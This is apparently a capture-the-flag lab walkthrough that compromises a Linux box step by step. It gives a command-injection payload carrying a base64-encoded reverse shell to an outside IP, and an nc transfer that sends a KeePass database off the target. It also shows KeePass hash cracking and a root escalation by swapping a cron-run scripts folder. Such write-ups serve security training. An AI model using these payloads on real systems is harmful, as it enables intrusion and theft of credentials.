After running Feroxbuster we find /cloud/:
feroxbuster -u http://10.10.254.116
...[snip]...
[####################] - 40s 30000/30000 742/s http://10.10.254.116/cloud/
...[snip]...USER
We can inject in the url param that is used to post images:
POST /cloud/ HTTP/1.1
Host: 10.10.254.116
...[snip]...
url=`echo+YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC44LjExOS4xMzcvNDQ0NCAwPiYx|base64+-d|bash`ncl;x.jpgNow we got a shell on the box.
In the /var/www/html/login.php we find some credentials:
...[snip]...
$logins = array('admin' => 'oncloud9','root' => 'oncloud9','administrator' => 'oncloud9');
...[snip]...USER
In the /opt/ folder there is a Keepass database (dataset.kdbx), lets download it:
On our machine:
nc -l -p 1234 > dataset.kdbxOn the remote:
nc -w 3 10.8.119.137 1234 < dataset.kdbxCracking Keepass
We need to crack the password for the Keepass database:
keepass2john dataset.kdbx > dataset.hash
john --wordlist=/usr/share/wordlists/rockyou.txt dataset.hash
...[snip]...
741852963 (dataset)
...[snip]...Opening the database with kpcli:
kpcli:/>open dataset.kdbx
kpcli:/>ls
=== Groups ===
Root/
kpcli:/>cd Root/
kpcli:/Root>ls
=== Entries ===
0. user:password
kpcli:/Root> show -a -f 0
Title: user:password
Uname: sysadmin
Pass: Cl0udP4ss40p4city#8700
...[snip]...This password can be used to SSH as user sysadmin.
ROOT
The scripts folder is not writable, but since its inside the sysadmin group we can move it.
So create a new folder (scripts_/) with a scripts.php file containing a reverse shell.
The moving the original scripts/ folder to scripts_bak and moving our scripts folder (scripts_/) to the old scripts folder location.
mv scripts scripts_bak && mv scripts_ scriptsNow after about a minute the scripts gets executed and we get a shell as root.